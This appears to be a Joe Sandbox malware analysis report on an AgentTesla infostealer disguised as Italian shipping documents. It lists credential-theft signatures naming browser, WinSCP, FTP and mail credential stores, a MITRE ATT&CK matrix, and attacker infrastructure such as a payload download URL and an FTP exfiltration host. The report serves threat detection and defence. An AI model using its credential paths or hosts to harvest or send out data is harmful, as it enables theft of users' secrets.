Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wabmig.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe

0_2_00403532

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wabmig.exe PID: 6824, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wabmig.exe PID: 6824, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.2945668788.0000000023C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wabmig.exe PID: 6824, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Obfuscated Files or Information	1 Credentials in Registry	126 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	111 Process Injection	1 Software Packing	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	151 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	151 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Documenti di spedizione 0009333000459595995.exe	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe	8%	ReversingLabs

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
http://185.29.11.53/bIGuEflfnZjESw74.bin	0%	Avira URL Cloud	safe
http://ftp.concaribe.com	100%	Avira URL Cloud	malware
https://aka.ms/pscore6lBfq	0%	Avira URL Cloud	safe
http://185.29.11.53/bIGuEflfnZjESw74.binI	0%	Avira URL Cloud	safe
https://api.ipify.org/t	0%	Avira URL Cloud	safe
http://concaribe.com	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org	104.26.13.205	true	false	unknown
concaribe.com	192.185.13.234	true	true	unknown
ftp.concaribe.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://185.29.11.53/bIGuEflfnZjESw74.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.org	wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBfq	powershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2381372075.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.29.11.53/bIGuEflfnZjESw74.binI	wabmig.exe, 00000006.00000002.2932025679.0000000008166000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ftp.concaribe.com	wabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://nsis.sf.net/NSIS_ErrorError	Documenti di spedizione 0009333000459595995.exe, Documenti di spedizione 0009333000459595995.exe.1.dr	false	URL Reputation: safe	unknown
http://concaribe.com	wabmig.exe, 00000006.00000002.2945668788.0000000023C27000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/t	wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2377692974.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 00000006.00000002.2945668788.0000000023BB1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2377692974.0000000004BE6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.29.11.53	unknown	European Union	203557	DATACLUB-NL	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
192.185.13.234	concaribe.com	United States	46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1518101
Start date and time:	2024-09-25 12:07:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Documenti di spedizione 0009333000459595995.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/12@2/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 153 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 5480 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Documenti di spedizione 0009333000459595995.exe

Simulations

Behavior and APIs

Time	Type	Description
06:07:57	API Interceptor	34x Sleep call for process: powershell.exe modified
06:09:09	API Interceptor	27015x Sleep call for process: wabmig.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.13.205	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	api.ipify.org/
	fptlVDDPkS.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	vstdlib_s64.dll.dll	Get hash	malicious	Quasar	Browse	api.ipify.org/
	SecuriteInfo.com.Win64.Evo-gen.28044.10443.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
192.185.13.234	draft bl_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	rMT103SwiftCopyoFPayment.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	Zoom_Invite.call-660194855683.wsf	Get hash	malicious	XWorm	Browse	104.26.12.205
	reported_account_violation-pdf-67223451.wsf	Get hash	malicious	XWorm	Browse	104.26.13.205
	COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.html	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse	104.26.12.205
	http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.html	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse	104.26.13.205
	http://pub-4d560104a89740f899e90e13245f1971.r2.dev/secure_response.html	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse	172.67.74.152
	http://pub-853a8c6d224746258050ceb1dd4dc8c3.r2.dev/response_auth.html	Get hash	malicious	Greatness Phishing Kit, HTMLPhisher	Browse	172.67.74.152
	http://pub-382f9bec371e490e8d86f2689f3915b0.r2.dev/response_start.html	Get hash	malicious	Unknown	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	John Lorenz-Employee-Benefits.docx	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	BL.xls	Get hash	malicious	Remcos, PureLog Stealer	Browse	188.114.97.9
	Audio_Msg..00290663894983Transcript.html	Get hash	malicious	HTMLPhisher	Browse	172.67.143.206
	https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=email	Get hash	malicious	HTMLPhisher	Browse	104.19.148.54
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Contract_Agreement_Tuesday September 2024.pdf	Get hash	malicious	Unknown	Browse	104.21.90.101
	https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	rPEDIDO-M456.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rMT103SwiftCopyoFPayment.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Setup_10024.exe	Get hash	malicious	Unknown	Browse	172.67.69.201
DATACLUB-NL	PO 00009876660887666000.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.121
	Bankcopyscanneddoc.exe	Get hash	malicious	RedLine	Browse	84.38.129.21
	xCjIO3SCur0S.exe	Get hash	malicious	Remcos	Browse	185.29.11.23
	new.cmd	Get hash	malicious	GuLoader	Browse	185.29.11.28
	temp.cmd	Get hash	malicious	Unknown	Browse	185.29.11.28
	price_request_.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	185.29.11.62
	disprovable.dll	Get hash	malicious	CryptOne, Qbot	Browse	84.38.133.191
	BL.xls	Get hash	malicious	Lokibot	Browse	84.38.129.114
	kej177el6.dll	Get hash	malicious	Qbot	Browse	84.38.133.191
	e0CIQlOSBx.exe	Get hash	malicious	Remcos, DBatLoader	Browse	84.38.133.134
UNIFIEDLAYER-AS-1US	Audio_Msg..00290663894983Transcript.html	Get hash	malicious	HTMLPhisher	Browse	162.215.211.9
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	162.241.27.20
	Shipping Document.exe	Get hash	malicious	AgentTesla	Browse	162.214.80.31
	https://wbh.sxx.temporary.site/	Get hash	malicious	Unknown	Browse	50.6.160.227
	https://pnp.zfx.mybluehost.me/wp-content/it/web/login.php/	Get hash	malicious	Unknown	Browse	50.6.153.149
	https://hr.schoolrundriver.com/system/fonts/wordpress/CHASE	Get hash	malicious	Unknown	Browse	192.232.218.112
	https://rb.gy/5ow3t3	Get hash	malicious	Unknown	Browse	50.6.153.151
	https://sjc.hgp.mybluehost.me/binance/bnb/access/account/login.php/	Get hash	malicious	Unknown	Browse	50.6.153.107
	http://www.icontci.com.br/ch/Swisscom/Swisscom/Swisscom-login/login/kunden/	Get hash	malicious	Unknown	Browse	108.179.253.238
	https://isz.npf.temporary.site/	Get hash	malicious	Unknown	Browse	192.185.52.100

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	CCE_000110.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	CCE_000110.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Get hash	malicious	XWorm	Browse	104.26.13.205
	https://app.pipefy.com/public/phase_redirect/f86fa292-1317-4dc5-8112-3af168025951?origin=email	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	rPO_CW00402902400438.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	https://docs.google.com/drawings/d/1Dvdk477POfuN_FWT5xAcbUon_2qhv7627e0t5q44TO8/preview?pli=1	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	rPEDIDO-M456.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	rMT103SwiftCopyoFPayment.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	MailAttachment.html	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	Meeting-037-911.one	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll	4hIPvzV6a2.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe	Get hash	malicious	Unknown	Browse
	3Dut8dFCwD.exe	Get hash	malicious	Unknown	Browse
	Ms63nDrOBa.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe	Get hash	malicious	Unknown	Browse
	rSCAN31804.exe	Get hash	malicious	GuLoader, Remcos	Browse
	rSCAN31804.exe	Get hash	malicious	GuLoader	Browse
	SCAN00381638.SCR.exe	Get hash	malicious	GuLoader, Remcos	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1mhdfyts.f32.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xgleuzwt.khu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.2959870663251625
Encrypted:	false
SSDEEP:	96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
MD5:	B4579BC396ACE8CAFD9E825FF63FE244
SHA1:	32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
